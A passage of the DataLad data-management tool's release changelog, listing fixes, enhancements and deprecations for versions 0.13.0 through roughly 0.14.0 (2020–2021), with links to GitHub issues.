<http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n command has been improved, with substantial speedups for recursive\n processing of many subdatasets.\n (`#4868 <https://github.com/datalad/datalad/issues/4868>`__)\n (`#5076 <https://github.com/datalad/datalad/issues/5076>`__)\n\n- Adding new subdatasets via\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n has been sped up.\n (`#4793 <https://github.com/datalad/datalad/issues/4793>`__)\n\n- `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__,\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n and\n `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n gained support for parallel operations that can be enabled via the\n ``--jobs`` command-line option or the new\n ``datalad.runtime.max-jobs`` configuration option.\n (`#5022 <https://github.com/datalad/datalad/issues/5022>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n\n - learned how to read data from standard input.\n (`#4669 <https://github.com/datalad/datalad/issues/4669>`__)\n - now supports tab-separated input.\n (`#4845 <https://github.com/datalad/datalad/issues/4845>`__)\n - now lets Python callers pass in a list of records rather than a\n file name.\n (`#5285 <https://github.com/datalad/datalad/issues/5285>`__)\n - gained a ``--drop-after`` switch that signals to drop a file’s\n content after downloading and adding it to the annex.\n (`#5081 <https://github.com/datalad/datalad/issues/5081>`__)\n - is now able to construct a tree of files from known checksums\n without downloading content via its new ``--key`` option.\n (`#5184 <https://github.com/datalad/datalad/issues/5184>`__)\n - records the URL file in the commit message as provided by the\n caller rather than using the resolved absolute path.\n (`#5091 <https://github.com/datalad/datalad/issues/5091>`__)\n - is now speedier.\n (`#4867 <https://github.com/datalad/datalad/issues/4867>`__)\n (`#5022 <https://github.com/datalad/datalad/issues/5022>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n learned how to create private repositories (thanks to Nolan Nichols).\n (`#4769 <https://github.com/datalad/datalad/issues/4769>`__)\n\n- `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n gained a ``--storage-sibling`` option. When\n ``--storage-sibling=only`` is specified, the storage sibling is\n created without an accompanying Git sibling. This enables using hosts\n without Git installed for storage.\n (`#5090 <https://github.com/datalad/datalad/issues/5090>`__)\n\n- The download machinery (and thus the ``datalad`` special remote)\n gained support for a new scheme, ``shub://``, which follows the same\n format used by ``singularity run`` and friends. In contrast to the\n short-lived URLs obtained by querying Singularity Hub directly,\n ``shub://`` URLs are suitable for registering with git-annex.\n (`#4816 <https://github.com/datalad/datalad/issues/4816>`__)\n\n- A provider is now included for https://registry-1.docker.io URLs.\n This is useful for storing an image’s blobs in a dataset and\n registering the URLs with git-annex.\n (`#5129 <https://github.com/datalad/datalad/issues/5129>`__)\n\n- The ``add-readme`` command now links to the `DataLad\n handbook <http://handbook.datalad.org>`__ rather than\n http://docs.datalad.org.\n (`#4991 <https://github.com/datalad/datalad/issues/4991>`__)\n\n- New option ``datalad.locations.extra-procedures`` specifies an\n additional location that should be searched for procedures.\n (`#5156 <https://github.com/datalad/datalad/issues/5156>`__)\n\n- The class for handling configuration values, ``ConfigManager``, now\n takes a lock before writes to allow for multiple processes to modify\n the configuration of a dataset.\n (`#4829 <https://github.com/datalad/datalad/issues/4829>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now records the original, unresolved URL for a subdataset under\n ``submodule.<name>.datalad-url`` in the parent’s .gitmodules,\n enabling later\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n calls to use the original URL. This is particularly useful for\n ``ria+`` URLs.\n (`#5346 <https://github.com/datalad/datalad/issues/5346>`__)\n\n- Installing a subdataset now uses custom handling rather than calling\n ``git submodule update --init``. This avoids some locking issues when\n running\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n in parallel and enables more accurate source URLs to be recorded.\n (`#4853 <https://github.com/datalad/datalad/issues/4853>`__)\n\n- ``GitRepo.get_content_info``, a helper that gets triggered by many\n commands, got faster by tweaking its ``git ls-files`` call.\n (`#5067 <https://github.com/datalad/datalad/issues/5067>`__)\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now includes credentials-related information (e.g. active backends)\n in the its output.\n (`#4982 <https://github.com/datalad/datalad/issues/4982>`__)\n\n- The ``call_git*`` methods of ``GitRepo`` now have a ``read_only``\n parameter. Callers can set this to ``True`` to promise that the\n provided command does not write to the repository, bypassing the cost\n of some checks and locking.\n (`#5070 <https://github.com/datalad/datalad/issues/5070>`__)\n\n- New ``call_annex*`` methods in the ``AnnexRepo`` class provide an\n interface for running git-annex commands similar to that of the\n ``GitRepo.call_git*`` methods.\n (`#5163 <https://github.com/datalad/datalad/issues/5163>`__)\n\n- It’s now possible to register a custom metadata indexer that is\n discovered by\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n and used to generate an index.\n (`#4963 <https://github.com/datalad/datalad/issues/4963>`__)\n\n- The ``ConfigManager`` methods ``get``, ``getbool``, ``getfloat``, and\n ``getint`` now return a single value (with same precedence as\n ``git config --get``) when there are multiple values for the same\n key (in the non-committed git configuration, if the key is present\n there, or in the dataset configuration). For ``get``, the old\n behavior can be restored by specifying ``get_all=True``.\n (`#4924 <https://github.com/datalad/datalad/issues/4924>`__)\n\n- Command-line scripts are now defined via the ``entry_points``\n argument of ``setuptools.setup`` instead of the ``scripts`` argument.\n (`#4695 <https://github.com/datalad/datalad/issues/4695>`__)\n\n- Interactive use of ``--help`` on the command-line now invokes a pager\n on more systems and installation setups.\n (`#5344 <https://github.com/datalad/datalad/issues/5344>`__)\n\n- The ``datalad`` special remote now tries to eliminate some\n unnecessary interactions with git-annex by being smarter about how it\n queries for URLs associated with a key.\n (`#4955 <https://github.com/datalad/datalad/issues/4955>`__)\n\n- The ``GitRepo`` class now does a better job of handling bare\n repositories, a step towards bare repositories support in DataLad.\n (`#4911 <https://github.com/datalad/datalad/issues/4911>`__)\n\n- More internal work to move the code base over to the new command\n runner. (`#4699 <https://github.com/datalad/datalad/issues/4699>`__)\n (`#4855 <https://github.com/datalad/datalad/issues/4855>`__)\n (`#4900 <https://github.com/datalad/datalad/issues/4900>`__)\n (`#4996 <https://github.com/datalad/datalad/issues/4996>`__)\n (`#5002 <https://github.com/datalad/datalad/issues/5002>`__)\n (`#5141 <https://github.com/datalad/datalad/issues/5141>`__)\n (`#5142 <https://github.com/datalad/datalad/issues/5142>`__)\n (`#5229 <https://github.com/datalad/datalad/issues/5229>`__)\n\n0.13.7 (January 04, 2021) – .\n=============================\n\n.. _fixes-6:\n\nFixes\n-----\n\n- Cloning from a RIA store on the local file system initialized annex\n in the Git sibling of the RIA source, which is problematic because\n all annex-related functionality should go through the storage\n sibling.\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now sets ``remote.origin.annex-ignore`` to ``true`` after cloning\n from RIA stores to prevent this.\n (`#5255 <https://github.com/datalad/datalad/issues/5255>`__)\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n invoked ``cp`` in a way that was not compatible with macOS.\n (`#5269 <https://github.com/datalad/datalad/issues/5269>`__)\n\n- Due to a bug in older Git versions (before 2.25), calling\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n with a file under .git/ (e.g., ``datalad status .git/config``)\n incorrectly reported the file as untracked. A workaround has been\n added. (`#5258 <https://github.com/datalad/datalad/issues/5258>`__)\n\n- Update tests for compatibility with latest git-annex.\n (`#5254 <https://github.com/datalad/datalad/issues/5254>`__)\n\n.. _enhancements-and-new-features-9:\n\nEnhancements and new features\n-----------------------------\n\n- `copy-file <http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html>`__\n now aborts if .git/ is in the target directory, adding to its\n existing .git/ safety checks.\n (`#5258 <https://github.com/datalad/datalad/issues/5258>`__)\n\n0.13.6 (December 14, 2020) – .\n==============================\n\n.. _fixes-7:\n\nFixes\n-----\n\n- An assortment of fixes for Windows compatibility.\n (`#5113 <https://github.com/datalad/datalad/issues/5113>`__)\n (`#5119 <https://github.com/datalad/datalad/issues/5119>`__)\n (`#5125 <https://github.com/datalad/datalad/issues/5125>`__)\n (`#5127 <https://github.com/datalad/datalad/issues/5127>`__)\n (`#5136 <https://github.com/datalad/datalad/issues/5136>`__)\n (`#5201 <https://github.com/datalad/datalad/issues/5201>`__)\n (`#5200 <https://github.com/datalad/datalad/issues/5200>`__)\n (`#5214 <https://github.com/datalad/datalad/issues/5214>`__)\n\n- Adding a subdataset on a system that defaults to using an adjusted\n branch (i.e. doesn’t support symlinks) didn’t properly set up the\n submodule URL if the source dataset was not in an adjusted state.\n (`#5127 <https://github.com/datalad/datalad/issues/5127>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n failed to push to a remote that did not have an ``annex-uuid`` value\n in the local ``.git/config``.\n (`#5148 <https://github.com/datalad/datalad/issues/5148>`__)\n\n- The default renderer has been improved to avoid a spurious leading\n space, which led to the displayed path being incorrect in some cases.\n (`#5121 <https://github.com/datalad/datalad/issues/5121>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n showed an uninformative error message when asked to configure an\n unknown remote.\n (`#5146 <https://github.com/datalad/datalad/issues/5146>`__)\n\n- `drop <http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html>`__\n confusingly relayed a suggestion from ``git annex drop`` to use\n ``--force``, an option that does not exist in ``datalad drop``.\n (`#5194 <https://github.com/datalad/datalad/issues/5194>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n no longer offers user/password authentication because it is no longer\n supported by GitHub.\n (`#5218 <https://github.com/datalad/datalad/issues/5218>`__)\n\n- The internal command runner’s handling of the event loop has been\n tweaked to hopefully fix issues with running DataLad from IPython.\n (`#5106 <https://github.com/datalad/datalad/issues/5106>`__)\n\n- SSH cleanup wasn’t reliably triggered by the ORA special remote on\n failure, leading to a stall with a particular version of git-annex,\n 8.20201103. (This is also resolved on git-annex’s end as of\n 8.20201127.)\n (`#5151 <https://github.com/datalad/datalad/issues/5151>`__)\n\n.. _enhancements-and-new-features-10:\n\nEnhancements and new features\n-----------------------------\n\n- The credential helper no longer asks the user to repeat tokens or AWS\n keys. (`#5219 <https://github.com/datalad/datalad/issues/5219>`__)\n\n- The new option ``datalad.locations.sockets`` controls where DataLad\n stores SSH sockets, allowing users to more easily work around file\n system and path length restrictions.\n (`#5238 <https://github.com/datalad/datalad/issues/5238>`__)\n\n0.13.5 (October 30, 2020) – .\n=============================\n\n.. _fixes-8:\n\nFixes\n-----\n\n- SSH connection handling has been reworked to fix cloning on Windows.\n A new configuration option, ``datalad.ssh.multiplex-connections``,\n defaults to false on Windows.\n (`#5042 <https://github.com/datalad/datalad/issues/5042>`__)\n\n- The ORA special remote and post-clone RIA configuration now provide\n authentication via DataLad’s credential mechanism and better handling\n of HTTP status codes.\n (`#5025 <https://github.com/datalad/datalad/issues/5025>`__)\n (`#5026 <https://github.com/datalad/datalad/issues/5026>`__)\n\n- By default, if a git executable is present in the same location as\n git-annex, DataLad modifies ``PATH`` when running git and git-annex\n so that the bundled git is used. This logic has been tightened to\n avoid unnecessarily adjusting the path, reducing the cases where the\n adjustment interferes with the local environment, such as special\n remotes in a virtual environment being masked by the system-wide\n variants.\n (`#5035 <https://github.com/datalad/datalad/issues/5035>`__)\n\n- git-annex is now consistently invoked as “git annex” rather than\n “git-annex” to work around failures on Windows.\n (`#5001 <https://github.com/datalad/datalad/issues/5001>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n called ``git annex sync ...`` on plain git repositories.\n (`#5051 <https://github.com/datalad/datalad/issues/5051>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n in genernal doesn’t support registering multiple levels of untracked\n subdatasets, but it can now properly register nested subdatasets when\n all of the subdataset paths are passed explicitly (e.g.,\n ``datalad save -d. sub-a sub-a/sub-b``).\n (`#5049 <https://github.com/datalad/datalad/issues/5049>`__)\n\n- When called with ``--sidecar`` and ``--explicit``,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n didn’t save the sidecar.\n (`#5017 <https://github.com/datalad/datalad/issues/5017>`__)\n\n- A couple of spots didn’t properly quote format fields when combining\n substrings into a format string.\n (`#4957 <https://github.com/datalad/datalad/issues/4957>`__)\n\n- The default credentials configured for ``indi-s3`` prevented\n anonymous access.\n (`#5045 <https://github.com/datalad/datalad/issues/5045>`__)\n\n.. _enhancements-and-new-features-11:\n\nEnhancements and new features\n-----------------------------\n\n- Messages about suppressed similar results are now rate limited to\n improve performance when there are many similar results coming\n through quickly.\n (`#5060 <https://github.com/datalad/datalad/issues/5060>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n can now be told to replace an existing sibling by passing\n ``--existing=replace``.\n (`#5008 <https://github.com/datalad/datalad/issues/5008>`__)\n\n- Progress bars now react to changes in the terminal’s width (requires\n tqdm 2.1 or later).\n (`#5057 <https://github.com/datalad/datalad/issues/5057>`__)\n\n0.13.4 (October 6, 2020) – .\n============================\n\n.. _fixes-9:\n\nFixes\n-----\n\n- Ephemeral clones mishandled bare repositories.\n (`#4899 <https://github.com/datalad/datalad/issues/4899>`__)\n\n- The post-clone logic for configuring RIA stores didn’t consider\n ``https://`` URLs.\n (`#4977 <https://github.com/datalad/datalad/issues/4977>`__)\n\n- DataLad custom remotes didn’t escape newlines in messages sent to\n git-annex.\n (`#4926 <https://github.com/datalad/datalad/issues/4926>`__)\n\n- The datalad-archives special remote incorrectly treated file names as\n percent-encoded.\n (`#4953 <https://github.com/datalad/datalad/issues/4953>`__)\n\n- The result handler didn’t properly escape “%” when constructing its\n message template.\n (`#4953 <https://github.com/datalad/datalad/issues/4953>`__)\n\n- In v0.13.0, the tailored rendering for specific subtypes of external\n command failures (e.g., “out of space” or “remote not available”) was\n unintentionally switched to the default rendering.\n (`#4966 <https://github.com/datalad/datalad/issues/4966>`__)\n\n- Various fixes and updates for the NDA authenticator.\n (`#4824 <https://github.com/datalad/datalad/issues/4824>`__)\n\n- The helper for getting a versioned S3 URL did not support anonymous\n access or buckets with “.” in their name.\n (`#4985 <https://github.com/datalad/datalad/issues/4985>`__)\n\n- Several issues with the handling of S3 credentials and token\n expiration have been addressed.\n (`#4927 <https://github.com/datalad/datalad/issues/4927>`__)\n (`#4931 <https://github.com/datalad/datalad/issues/4931>`__)\n (`#4952 <https://github.com/datalad/datalad/issues/4952>`__)\n\n.. _enhancements-and-new-features-12:\n\nEnhancements and new features\n-----------------------------\n\n- A warning is now given if the detected Git is below v2.13.0 to let\n users that run into problems know that their Git version is likely\n the culprit.\n (`#4866 <https://github.com/datalad/datalad/issues/4866>`__)\n\n- A fix to\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n in v0.13.2 introduced a regression that surfaces when\n ``push.default`` is configured to “matching” and prevents the\n git-annex branch from being pushed. Note that, as part of the fix,\n the current branch is now always pushed even when it wouldn’t be\n based on the configured refspec or ``push.default`` value.\n (`#4896 <https://github.com/datalad/datalad/issues/4896>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n\n - now allows spelling the empty string value of ``--since=`` as\n ``^`` for consistency with\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__.\n (`#4683 <https://github.com/datalad/datalad/issues/4683>`__)\n - compares a revision given to ``--since=`` with ``HEAD`` rather\n than the working tree to speed up the operation.\n (`#4448 <https://github.com/datalad/datalad/issues/4448>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n\n - emits more INFO-level log messages.\n (`#4764 <https://github.com/datalad/datalad/issues/4764>`__)\n - provides better handling of adjusted branches and aborts with a\n clear error for cases that are not supported.\n (`#5328 <https://github.com/datalad/datalad/issues/5328>`__)\n\n- The archives are handled with p7zip, if available, since DataLad\n v0.12.0. This implementation now supports .tgz and .tbz2 archives.\n (`#4877 <https://github.com/datalad/datalad/issues/4877>`__)\n\n0.13.3 (August 28, 2020) – .\n============================\n\n.. _fixes-10:\n\nFixes\n-----\n\n- Work around a Python bug that led to our asyncio-based command runner\n intermittently failing to capture the output of commands that exit\n very quickly.\n (`#4835 <https://github.com/datalad/datalad/issues/4835>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n displayed an overestimate of the transfer size when multiple files\n pointed to the same key.\n (`#4821 <https://github.com/datalad/datalad/issues/4821>`__)\n\n- When\n `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n calls ``git annex addurl``, it catches and reports any failures\n rather than crashing. A change in v0.12.0 broke this handling in a\n particular case.\n (`#4817 <https://github.com/datalad/datalad/issues/4817>`__)\n\n.. _enhancements-and-new-features-13:\n\nEnhancements and new features\n-----------------------------\n\n- The wrapper functions returned by decorators are now given more\n meaningful names to hopefully make tracebacks easier to digest.\n (`#4834 <https://github.com/datalad/datalad/issues/4834>`__)\n\n0.13.2 (August 10, 2020) – .\n============================\n\nDeprecations\n------------\n\n- The ``allow_quick`` parameter of ``AnnexRepo.file_has_content`` and\n ``AnnexRepo.is_under_annex`` is now ignored and will be removed in a\n later release. This parameter was only relevant for git-annex\n versions before 7.20190912.\n (`#4736 <https://github.com/datalad/datalad/issues/4736>`__)\n\n.. _fixes-11:\n\nFixes\n-----\n\n- Updates for compatibility with recent git and git-annex releases.\n (`#4746 <https://github.com/datalad/datalad/issues/4746>`__)\n (`#4760 <https://github.com/datalad/datalad/issues/4760>`__)\n (`#4684 <https://github.com/datalad/datalad/issues/4684>`__)\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n didn’t sync the git-annex branch when ``--data=nothing`` was\n specified.\n (`#4786 <https://github.com/datalad/datalad/issues/4786>`__)\n\n- The ``datalad.clone.reckless`` configuration wasn’t stored in\n non-annex datasets, preventing the values from being inherited by\n annex subdatasets.\n (`#4749 <https://github.com/datalad/datalad/issues/4749>`__)\n\n- Running the post-update hook installed by ``create-sibling --ui``\n could overwrite web log files from previous runs in the unlikely\n event that the hook was executed multiple times in the same second.\n (`#4745 <https://github.com/datalad/datalad/issues/4745>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n inspected git’s standard error in a way that could cause an attribute\n error. (`#4775 <https://github.com/datalad/datalad/issues/4775>`__)\n\n- When cloning a repository whose ``HEAD`` points to a branch without\n commits,\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n tries to find a more useful branch to check out. It unwisely\n considered adjusted branches.\n (`#4792 <https://github.com/datalad/datalad/issues/4792>`__)\n\n- Since v0.12.0, ``SSHManager.close`` hasn’t closed connections when\n the ``ctrl_path`` argument was explicitly given.\n (`#4757 <https://github.com/datalad/datalad/issues/4757>`__)\n\n- When working in a dataset in which ``git annex init`` had not yet\n been called, the ``file_has_content`` and ``is_under_annex`` methods\n of ``AnnexRepo`` incorrectly took the “allow quick” code path on file\n systems that did not support it\n (`#4736 <https://github.com/datalad/datalad/issues/4736>`__)\n\nEnhancements\n------------\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n now assigns version 4 (random) UUIDs instead of version 1 UUIDs that\n encode the time and hardware address.\n (`#4790 <https://github.com/datalad/datalad/issues/4790>`__)\n\n- The documentation for\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n now does a better job of describing the interaction between\n ``--dataset`` and ``PATH``.\n (`#4763 <https://github.com/datalad/datalad/issues/4763>`__)\n\n- The ``format_commit`` and ``get_hexsha`` methods of ``GitRepo`` have\n been sped up.\n (`#4807 <https://github.com/datalad/datalad/issues/4807>`__)\n (`#4806 <https://github.com/datalad/datalad/issues/4806>`__)\n\n- A better error message is now shown when the ``^`` or ``^.``\n shortcuts for ``--dataset`` do not resolve to a dataset.\n (`#4759 <https://github.com/datalad/datalad/issues/4759>`__)\n\n- A more helpful error message is now shown if a caller tries to\n download an ``ftp://`` link but does not have ``request_ftp``\n installed.\n (`#4788 <https://github.com/datalad/datalad/issues/4788>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n now tries harder to get up-to-date availability information after\n auto-enabling ``type=git`` special remotes.\n (`#2897 <https://github.com/datalad/datalad/issues/2897>`__)\n\n0.13.1 (July 17, 2020) – .\n==========================\n\n.. _fixes-12:\n\nFixes\n-----\n\n- Cloning a subdataset should inherit the parent’s\n ``datalad.clone.reckless`` value, but that did not happen when\n cloning via ``datalad get`` rather than ``datalad install`` or\n ``datalad clone``.\n (`#4657 <https://github.com/datalad/datalad/issues/4657>`__)\n\n- The default result renderer crashed when the result did not have a\n ``path`` key.\n (`#4666 <https://github.com/datalad/datalad/issues/4666>`__)\n (`#4673 <https://github.com/datalad/datalad/issues/4673>`__)\n\n- ``datalad push`` didn’t show information about ``git push`` errors\n when the output was not in the format that it expected.\n (`#4674 <https://github.com/datalad/datalad/issues/4674>`__)\n\n- ``datalad push`` silently accepted an empty string for ``--since``\n even though it is an invalid value.\n (`#4682 <https://github.com/datalad/datalad/issues/4682>`__)\n\n- Our JavaScript testing setup on Travis grew stale and has now been\n updated. (Thanks to Xiao Gui.)\n (`#4687 <https://github.com/datalad/datalad/issues/4687>`__)\n\n- The new class for running Git commands (added in v0.13.0) ignored any\n changes to the process environment that occurred after instantiation.\n (`#4703 <https://github.com/datalad/datalad/issues/4703>`__)\n\n.. _enhancements-and-new-features-14:\n\nEnhancements and new features\n-----------------------------\n\n- ``datalad push`` now avoids unnecessary ``git push`` dry runs and\n pushes all refspecs with a single ``git push`` call rather than\n invoking ``git push`` for each one.\n (`#4692 <https://github.com/datalad/datalad/issues/4692>`__)\n (`#4675 <https://github.com/datalad/datalad/issues/4675>`__)\n\n- The readability of SSH error messages has been improved.\n (`#4729 <https://github.com/datalad/datalad/issues/4729>`__)\n\n- ``datalad.support.annexrepo`` avoids calling\n ``datalad.utils.get_linux_distribution`` at import time and caches\n the result once it is called because, as of Python 3.8, the function\n uses ``distro`` underneath, adding noticeable overhead.\n (`#4696 <https://github.com/datalad/datalad/issues/4696>`__)\n\n Third-party code should be updated to use ``get_linux_distribution``\n directly in the unlikely event that the code relied on the\n import-time call to ``get_linux_distribution`` setting the\n ``linux_distribution_name``, ``linux_distribution_release``, or\n ``on_debian_wheezy`` attributes in \\`datalad.utils.\n\n0.13.0 (June 23, 2020) – .\n==========================\n\nA handful of new commands, including ``copy-file``, ``push``, and\n``create-sibling-ria``, along with various fixes and enhancements\n\n.. _major-refactoring-and-deprecations-1:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The ``no_annex`` parameter of\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n which is exposed in the Python API but not the command line, is\n deprecated and will be removed in a later release. Use the new\n ``annex`` argument instead, flipping the value. Command-line callers\n that use ``--no-annex`` are unaffected.\n (`#4321 <https://github.com/datalad/datalad/issues/4321>`__)\n\n- ``datalad add``, which was deprecated in 0.12.0, has been removed.\n (`#4158 <https://github.com/datalad/datalad/issues/4158>`__)\n (`#4319 <https://github.com/datalad/datalad/issues/4319>`__)\n\n- The following ``GitRepo`` and ``AnnexRepo`` methods have been\n removed: ``get_changed_files``, ``get_missing_files``, and\n ``get_deleted_files``.\n (`#4169 <https://github.com/datalad/datalad/issues/4169>`__)\n (`#4158 <https://github.com/datalad/datalad/issues/4158>`__)\n\n- The ``get_branch_commits`` method of ``GitRepo`` and ``AnnexRepo``\n has been renamed to ``get_branch_commits_``.\n (`#3834 <https://github.com/datalad/datalad/issues/3834>`__)\n\n- The custom ``commit`` method of ``AnnexRepo`` has been removed, and\n ``AnnexRepo.commit`` now resolves to the parent method,\n ``GitRepo.commit``.\n (`#4168 <https://github.com/datalad/datalad/issues/4168>`__)\n\n- GitPython’s ``git.repo.base.Repo`` class is no longer available via\n the ``.repo`` attribute of ``GitRepo`` and ``AnnexRepo``.\n (`#4172 <https://github.com/datalad/datalad/issues/4172>`__)\n\n- ``AnnexRepo.get_corresponding_branch`` now returns ``None`` rather\n than the current branch name when a managed branch is not checked\n out. (`#4274 <https://github.com/datalad/datalad/issues/4274>`__)\n\n- The special UUID for git-annex web remotes is now available as\n ``datalad.consts.WEB_SPECIAL_REMOTE_UUID``. It remains accessible as\n ``AnnexRepo.WEB_UUID`` for compatibility, but new code should use\n ``consts.WEB_SPECIAL_REMOTE_UUID``\n (`#4460 <https://github.com/datalad/datalad/issues/4460>`__).\n\n.. _fixes-13:\n\nFixes\n-----\n\n- Widespread improvements in functionality and test coverage on Windows\n and crippled file systems in general.\n (`#4057 <https://github.com/datalad/datalad/issues/4057>`__)\n (`#4245 <https://github.com/datalad/datalad/issues/4245>`__)\n (`#4268 <https://github.com/datalad/datalad/issues/4268>`__)\n (`#4276 <https://github.com/datalad/datalad/issues/4276>`__)\n (`#4291 <https://github.com/datalad/datalad/issues/4291>`__)\n (`#4296 <https://github.com/datalad/datalad/issues/4296>`__)\n (`#4301 <https://github.com/datalad/datalad/issues/4301>`__)\n (`#4303 <https://github.com/datalad/datalad/issues/4303>`__)\n (`#4304 <https://github.com/datalad/datalad/issues/4304>`__)\n (`#4305 <https://github.com/datalad/datalad/issues/4305>`__)\n (`#4306 <https://github.com/datalad/datalad/issues/4306>`__)\n\n- ``AnnexRepo.get_size_from_key`` incorrectly handled file chunks.\n (`#4081 <https://github.com/datalad/datalad/issues/4081>`__)\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n would too readily clobber existing paths when called with\n ``--existing=replace``. It now gets confirmation from the user before\n doing so if running interactively and unconditionally aborts when\n running non-interactively.\n (`#4147 <https://github.com/datalad/datalad/issues/4147>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n (`#4159 <https://github.com/datalad/datalad/issues/4159>`__)\n\n - queried the incorrect branch configuration when updating non-annex\n repositories.\n - didn’t account for the fact that the local repository can be\n configured as the upstream “remote” for a branch.\n\n- When the caller included ``--bare`` as a ``git init`` option,\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n crashed creating the bare repository, which is currently unsupported,\n rather than aborting with an informative error message.\n (`#4065 <https://github.com/datalad/datalad/issues/4065>`__)\n\n- The logic for automatically propagating the ‘origin’ remote when\n cloning a local source could unintentionally trigger a fetch of a\n non-local remote.\n (`#4196 <https://github.com/datalad/datalad/issues/4196>`__)\n\n- All remaining ``get_submodules()`` call sites that relied on the\n temporary compatibility layer added in v0.12.0 have been updated.\n (`#4348 <https://github.com/datalad/datalad/issues/4348>`__)\n\n- The custom result summary renderer for\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__,\n which was visible with ``--output-format=tailored``, displayed\n incorrect and confusing information in some cases. The custom\n renderer has been removed entirely.\n (`#4471 <https://github.com/datalad/datalad/issues/4471>`__)\n\n- The documentation for the Python interface of a command listed an\n incorrect default when the command overrode the value of command\n parameters such as ``result_renderer``.\n (`#4480 <https://github.com/datalad/datalad/issues/4480>`__)\n\n.. _enhancements-and-new-features-15:\n\nEnhancements and new features\n-----------------------------\n\n- The default result renderer learned to elide a chain of results after\n seeing ten consecutive results that it considers similar, which\n improves the display of actions that have many results (e.g., saving\n hundreds of files).\n (`#4337 <https://github.com/datalad/datalad/issues/4337>`__)\n\n- The default result renderer, in addition to “tailored” result\n renderer, now triggers the custom summary renderer, if any.\n (`#4338 <https://github.com/datalad/datalad/issues/4338>`__)\n\n- The new command\n `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n provides support for creating a sibling in a `RIA\n store <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__.\n (`#4124 <https://github.com/datalad/datalad/issues/4124>`__)\n\n- DataLad ships with a new special remote, git-annex-remote-ora, for\n interacting with `RIA\n stores <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__\n and a new command\n `export-archive-ora <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export-archive-ora.html>`__\n for exporting an archive from a local annex object store.\n (`#4260 <https://github.com/datalad/datalad/issues/4260>`__)\n (`#4203 <https://github.com/datalad/datalad/issues/4203>`__)\n\n- The new command\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n provides an alternative interface to\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n for pushing a dataset hierarchy to a sibling.\n (`#4206 <https://github.com/datalad/datalad/issues/4206>`__)\n (`#4581 <https://github.com/datalad/datalad/issues/4581>`__)\n (`#4617 <https://github.com/datalad/datalad/issues/4617>`__)\n (`#4620 <https://github.com/datalad/datalad/issues/4620>`__)\n\n- The new command\n `copy-file <http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html>`__\n copies files and associated availability information from one dataset\n to another.\n (`#4430 <https://github.com/datalad/datalad/issues/4430>`__)\n\n- The command examples have been expanded and improved.\n (`#4091 <https://github.com/datalad/datalad/issues/4091>`__)\n (`#4314 <https://github.com/datalad/datalad/issues/4314>`__)\n (`#4464 <https://github.com/datalad/datalad/issues/4464>`__)\n\n- The tooling for linking to 